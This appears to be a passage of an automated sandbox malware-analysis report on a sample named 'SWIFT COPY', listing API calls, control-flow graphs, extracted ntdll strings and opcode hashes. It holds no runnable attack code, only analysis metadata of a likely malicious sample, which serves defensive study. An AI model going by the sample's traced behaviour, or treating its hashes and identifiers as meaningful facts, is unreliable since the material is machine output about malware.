                                                                                              • Instruction Fuzzy Hash: 8A0152B1E4010DB7DB10EAA1DC42FDEB3789B14308F4081A6E90897240F674EB48CB95
                                                                                              APIs
                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C774
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close
                                                                                              • String ID:
                                                                                              • API String ID: 3535843008-0
                                                                                              • Opcode ID: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction ID: 9e0658677882e74928744a82f9e72dba2eb639633bc470e9b9a98b36903aceda
                                                                                              • Opcode Fuzzy Hash: 085c86df9dafaac33c1aaa89ff5402a964957b63bb21a493f7364fc0a86431e4
                                                                                              • Instruction Fuzzy Hash: 63E04F752002147BC610EA5AEC41E9B775CDFC5724F004419FA48A7241CA75BA11C6A4
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: f9113bcf04240d18087368b35377498973b34a5477a064d91713415e025a9dc7
                                                                                              • Instruction ID: 0eb9bf6dc68a97c3b9e4e40079c2a98e85466a45beac775425efc4f905cf4f44
                                                                                              • Opcode Fuzzy Hash: f9113bcf04240d18087368b35377498973b34a5477a064d91713415e025a9dc7
                                                                                              • Instruction Fuzzy Hash: AA900265202500039105725C4454616900B97E0305B95C061E1014594DC52989956225
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 5582de3a658c3daa77448055d94ebd4c882e81c57671a64fecdc88a1e6253a74
                                                                                              • Instruction ID: e4e897a463f56b6fb8e0c5915ec360c3c7bb91d943529b4ff4c9bc99a5ea0428
                                                                                              • Opcode Fuzzy Hash: 5582de3a658c3daa77448055d94ebd4c882e81c57671a64fecdc88a1e6253a74
                                                                                              • Instruction Fuzzy Hash: 3C90023520150413E111725C4544707500A97D0345FD5C452A042455CDD65A8A56A221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 17c2525012a1076020322cfdbbcdd472ec9d57205d99d63d1cbe393f9615b9e8
                                                                                              • Instruction ID: 1204eb089bf2aa0b504953bd3068aaeb6a5d5b78801919abfdfacdb545ab441a
                                                                                              • Opcode Fuzzy Hash: 17c2525012a1076020322cfdbbcdd472ec9d57205d99d63d1cbe393f9615b9e8
                                                                                              • Instruction Fuzzy Hash: 6D90023520158802E110725C844474A500697D0305F99C451A442465CDC69989957221
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: defd4171429106ff033c9f6ba7f3f0f328ccfcfc9ea81a2b6cd6c6cba6798e00
                                                                                              • Instruction ID: d66b4b142d73d651a96a1ca85a1cd0c07473d356dc53195415dad2be22a10eaf
                                                                                              • Opcode Fuzzy Hash: defd4171429106ff033c9f6ba7f3f0f328ccfcfc9ea81a2b6cd6c6cba6798e00
                                                                                              • Instruction Fuzzy Hash: DB90023560560402E100725C4554706600697D0305FA5C451A042456CDC7998A5566A2

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 132 414119-414120 133 414122-414129 132->133 134 4140a6-4140b4 132->134 137 41412b-41412f 133->137 135 4140ba-4140f1 call 4044f3 call 424f53 134->135 136 4140b5 call 417813 134->136 149 414113-414118 135->149 150 4140f3-414104 PostThreadMessageW 135->150 136->135 139 414131-414136 137->139 140 41414d-414153 137->140 139->140 142 414138-41413d 139->142 140->137 143 414155-414158 140->143 142->140 145 41413f-414146 142->145 147 414159-41415c 145->147 148 414148-41414b 145->148 148->140 148->147 150->149 151 414106-414110 150->151 151->149
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                              • Instruction ID: 26a48773d49b5d4830db5d6a3abe6c0441e01ffa8e7dd764610f6d3443abad5e
                                                                                              • Opcode Fuzzy Hash: c6518daae546de9adca5e6c6ca355c75d1bb2b16d27b4bf47e46c483232480bd
                                                                                              • Instruction Fuzzy Hash: F5117B31D0024879EB309E708C05FEF6B654BD2764F48829AFE14AB3D2D77949C28788

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 152 41406f-414070 153 414072-41407a 152->153 154 41408f-4140f1 call 42e873 call 42f283 call 417813 call 4044f3 call 424f53 152->154 165 414113-414118 154->165 166 4140f3-414104 PostThreadMessageW 154->166 166->165 167 414106-414110 166->167 167->165
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                              • Instruction ID: 0f7a8f7452082f141b53ab21a3766a0a1486675bc0825100db931c7ccd50f644
                                                                                              • Opcode Fuzzy Hash: 8d5fe0c3c9cdc8e49817f3f7c81564a0f05defde10c584dc7b50df3ffdad5cdd
                                                                                              • Instruction Fuzzy Hash: BA01DF32E4521876E7209791AC02FDEB7689F81B14F40815AFF147B381D6795A0247D9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 168 41407c-414093 170 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 168->170 171 414097 call 42e873 168->171 180 414113-414118 170->180 181 4140f3-414104 PostThreadMessageW 170->181 171->170 181->180 182 414106-414110 181->182 182->180
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                              • Instruction ID: 087d0fd33435a02eb29b34bb39c81c2954cd161ddf22aaec2d78f1b904196256
                                                                                              • Opcode Fuzzy Hash: f97a2dbf0e9be62fbf43441762b2e807058933e57bce9d2d8aa05f467568e6ba
                                                                                              • Instruction Fuzzy Hash: 9E112F31E40218B6EB2197E18C02FDF7B7C8F81B44F408069FA047B2C1D7B85A0687E5

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 183 414083-414093 184 41409c-4140f1 call 42f283 call 417813 call 4044f3 call 424f53 183->184 185 414097 call 42e873 183->185 194 414113-414118 184->194 195 4140f3-414104 PostThreadMessageW 184->195 185->184 195->194 196 414106-414110 195->196 196->194
                                                                                              APIs
                                                                                              • PostThreadMessageW.USER32(40F193-3PQ,00000111,00000000,00000000), ref: 00414100
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: MessagePostThread
                                                                                              • String ID: 40F193-3PQ$40F193-3PQ
                                                                                              • API String ID: 1836367815-1005098266
                                                                                              • Opcode ID: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                              • Instruction ID: 5cdb5b93b2f758ed905246f69099698f9d56dcfdbf049b8bc6d5a2d33433c103
                                                                                              • Opcode Fuzzy Hash: e6ba9eb905182b9ec34c9235bf651bffb639cd546324c055ce8da76e89865faa
                                                                                              • Instruction Fuzzy Hash: FA012B31D40218B6EB20A7E18C02FDF7B7C8F81B44F008059FA047B2C1D7B8560687E9

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 472 41794b-41794d 474 417879-417887 LdrLoadDll 472->474 475 4178df-417907 472->475 478 41788a-41788d 474->478 476 417980-417982 475->476 477 417909-417927 475->477 480 417983 476->480 479 417929-41792c 477->479 481 4179a1-4179ce call 42f413 call 42b7b3 479->481 482 41792e 479->482 482->480 484 417930 482->484 486 417932-417945 484->486 486->486 488 417947 486->488 488->479 490 417949-41794a 488->490 490->472
                                                                                              APIs
                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417885
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Load
                                                                                              • String ID: &cE}
                                                                                              • API String ID: 2234796835-1295445062
                                                                                              • Opcode ID: 6439951d975df4877770d5839dc9fe536a531832f717cbe13e993940e6d1af77
                                                                                              • Instruction ID: 54892b8292313859b9e7f06cc59cb8e9e8f05bca02ccaa695f3ba87433a3d82d
                                                                                              • Opcode Fuzzy Hash: 6439951d975df4877770d5839dc9fe536a531832f717cbe13e993940e6d1af77
                                                                                              • Instruction Fuzzy Hash: FE31CAB2B882096BDB11EF74DC42FEAB7B8EB40344F4801DEE8088B146E6359448CB94

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 491 42ca93-42cad1 call 404583 call 42d943 RtlFreeHeap
                                                                                              APIs
                                                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CACC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: FreeHeap
                                                                                              • String ID: neA
                                                                                              • API String ID: 3298025750-2757349852
                                                                                              • Opcode ID: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction ID: 9121e88aff0d49045895fe5efa263953fc4bc90d71136d3efce1da578365df1c
                                                                                              • Opcode Fuzzy Hash: 24838165d5d3598a3ea7bb2b05c3706a31ee61b17379b23aec4e324c29ae2178
                                                                                              • Instruction Fuzzy Hash: 45E092B22042147BD610EF59EC41E9B37ADEFC8710F004419FE09A7242C771B9108BB4

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 552 42ca53-42ca91 call 404583 call 42d943 RtlAllocateHeap
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(?,0041E604,?,?,00000000,?,0041E604,?,?,?), ref: 0042CA8C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction ID: 2033942cd3b101f58bf4d77c2136ec80b735e96d56796e01d22862b954715158
                                                                                              • Opcode Fuzzy Hash: dd039b19f67d4f101c1c83f73f2c4a615ab43ac305152a862787506efeb51d13
                                                                                              • Instruction Fuzzy Hash: 7CE06DB12442047BDA10EE59EC42E9B37ADDFC4710F004419FA08A7241DA71B95087B4
                                                                                              APIs
                                                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,53EC9B57,?,?,53EC9B57), ref: 0042CB07
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2223687657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_400000_SWIFT COPY.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExitProcess
                                                                                              • String ID:
                                                                                              • API String ID: 621844428-0
                                                                                              • Opcode ID: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                              • Instruction ID: 4f7d0579f0d3a644c73c2585b10cf1452984b28a7a8af53eb300c7de9d046712
                                                                                              • Opcode Fuzzy Hash: e026587fc2ca3ee475d83143d77eba9ec23cbd0096a79b0590467f2d36563e8f
                                                                                              • Instruction Fuzzy Hash: CBE046722002147BC620AA6AEC05F9BB76CDBC5724F00441AFB0CAB282DA75BA0187A4
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 8f4586df77c84cd6e8f920dc5106fa6c9f84e47a87251ac6d924451d30f034e8
                                                                                              • Instruction ID: e4fb0378acc627aab97e910c7b9d6079cbacc7ccc6be885a03a057387b1bea7b
                                                                                              • Opcode Fuzzy Hash: 8f4586df77c84cd6e8f920dc5106fa6c9f84e47a87251ac6d924451d30f034e8
                                                                                              • Instruction Fuzzy Hash: A7B09B719015C5C5EE11F7644608717790577D0705F55C061D3030645F473CC1D5E275
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2160512332
                                                                                              • Opcode ID: 8078f7db5927f319619db4cb6212b944780b143666b1876b8b40a5a6c8a447a7
                                                                                              • Instruction ID: 3eb96fe44c8ca13f05e3280c22f2b484c5e3fff6bb39b584f77afe2c0f1c5d9a
                                                                                              • Opcode Fuzzy Hash: 8078f7db5927f319619db4cb6212b944780b143666b1876b8b40a5a6c8a447a7
                                                                                              • Instruction Fuzzy Hash: C9929E71604342ABE725DE28C881BABBBE8FF84758F044A1DFB94D7650E774E844CB52
                                                                                              Strings
                                                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A540A, 013A5496, 013A5519
                                                                                              • Invalid debug info address of this critical section, xrefs: 013A54B6
                                                                                              • Thread identifier, xrefs: 013A553A
                                                                                              • Critical section address, xrefs: 013A5425, 013A54BC, 013A5534
                                                                                              • double initialized or corrupted critical section, xrefs: 013A5508
                                                                                              • Critical section address., xrefs: 013A5502
                                                                                              • corrupted critical section, xrefs: 013A54C2
                                                                                              • undeleted critical section in freed memory, xrefs: 013A542B
                                                                                              • Address of the debug info found in the active list., xrefs: 013A54AE, 013A54FA
                                                                                              • 8, xrefs: 013A52E3
                                                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 013A5543
                                                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A54CE
                                                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013A54E2
                                                                                              • Critical section debug info address, xrefs: 013A541F, 013A552E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                              • API String ID: 0-2368682639
                                                                                              • Opcode ID: 4e6bde2881901533b8361f44da61860ad223f0e0848d2ef1d3680aca2029341b
                                                                                              • Instruction ID: 667a1a039c2bfa4251fd0f607244cc1cf3a3f8ca57e83e00d4d7dad9a8e5ede2
                                                                                              • Opcode Fuzzy Hash: 4e6bde2881901533b8361f44da61860ad223f0e0848d2ef1d3680aca2029341b
                                                                                              • Instruction Fuzzy Hash: 8C81EEB0A40318EFDB24CF99C840BAEBBB9FB48718F644599F504B7680D774A940CB64
                                                                                              Strings
                                                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 013A2624
                                                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013A25EB
                                                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 013A261F
                                                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 013A2506
                                                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 013A2409
                                                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 013A2498
                                                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 013A2412
                                                                                              • @, xrefs: 013A259B
                                                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 013A2602
                                                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013A22E4
                                                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013A24C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                              • API String ID: 0-4009184096
                                                                                              • Opcode ID: d7a408966d32600f3c49f2f3c188b246fc7c4ea3dd0ee916f29f63d0336d37a5
                                                                                              • Instruction ID: 904ec5fdca168525cdecf89e61972e30583af41a1796f54e50c7bebf8a6977ba
                                                                                              • Opcode Fuzzy Hash: d7a408966d32600f3c49f2f3c188b246fc7c4ea3dd0ee916f29f63d0336d37a5
                                                                                              • Instruction Fuzzy Hash: 8F0271F1D002299FDB31DB58CC80BDAB7BCAB54308F4541EAE649A7245E7709E84CF59
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                              • API String ID: 0-2515994595
                                                                                              • Opcode ID: a755a86d5d5f522ad628e7503dda3519dbb72101376ae10e1e27cb60ca0ffd0f
                                                                                              • Instruction ID: a064dfb78126f302e72f76a077acb12fee43aefca9301609f3891ffdf737196e
                                                                                              • Opcode Fuzzy Hash: a755a86d5d5f522ad628e7503dda3519dbb72101376ae10e1e27cb60ca0ffd0f
                                                                                              • Instruction Fuzzy Hash: F051C0725043459BD73ACF189844BABBBECFF94658F14495DF999C3280E770E608CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                              • API String ID: 0-1700792311
                                                                                              • Opcode ID: bf189f4b8253f924fe5ba1fc5496b6428047dec8161ffc8c27d11f26b5950888
                                                                                              • Instruction ID: 0bb0ef0b728dd33345e9a43e76c73902eee00d06f656c3ddd7e32093a26fdf7b
                                                                                              • Opcode Fuzzy Hash: bf189f4b8253f924fe5ba1fc5496b6428047dec8161ffc8c27d11f26b5950888
                                                                                              • Instruction Fuzzy Hash: D7D1DF316007A5DFDB2AEF68C448AADBBF1FF59718F188049F445AB692C7B49981CF10
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`,$h=$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-3391357973
                                                                                              • Opcode ID: 762681647ff77ff7ba5891b6941aada8cbc6e6a86405b424ab4adf6fe787df77
                                                                                              • Instruction ID: 395b99d844ef9ca26ba0e178c16a95d96b87147d54285e880bb642bd30e68819
                                                                                              • Opcode Fuzzy Hash: 762681647ff77ff7ba5891b6941aada8cbc6e6a86405b424ab4adf6fe787df77
                                                                                              • Instruction Fuzzy Hash: 0A9148B0B00315DBEB36DF1CD846BAA7BA9FF40B5CF948129E9007B699D7B49841C790
                                                                                              Strings
                                                                                              • HandleTraces, xrefs: 013B8C8F
                                                                                              • VerifierFlags, xrefs: 013B8C50
                                                                                              • VerifierDebug, xrefs: 013B8CA5
                                                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 013B8A67
                                                                                              • VerifierDlls, xrefs: 013B8CBD
                                                                                              • `,, xrefs: 013B8A35, 013B8A5F
                                                                                              • AVRF: -*- final list of providers -*- , xrefs: 013B8B8F
                                                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 013B8A3D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`,
                                                                                              • API String ID: 0-1326338960
                                                                                              • Opcode ID: b8bd91e552b9e0d0514d807911a50878d9a6b91f9e18da4b01383264dd918146
                                                                                              • Instruction ID: e0609bd202385a993967b439d9ed08d83191bf18e92828897ad5732a536bb41d
                                                                                              • Opcode Fuzzy Hash: b8bd91e552b9e0d0514d807911a50878d9a6b91f9e18da4b01383264dd918146
                                                                                              • Instruction Fuzzy Hash: 189125B1641316AFD721DF2C88C0BEAB7ACAB54B1CF850499FB446FA50E7309C40CBA5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`,$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                              • API String ID: 0-2254957362
                                                                                              • Opcode ID: f5007826238df81c11f935aa53927fcbbe00984877549e648016c0d40a20f01f
                                                                                              • Instruction ID: 4ff758233a5a18f2089a61c87ee974229e599d9bac3d010db5e7307300829de0
                                                                                              • Opcode Fuzzy Hash: f5007826238df81c11f935aa53927fcbbe00984877549e648016c0d40a20f01f
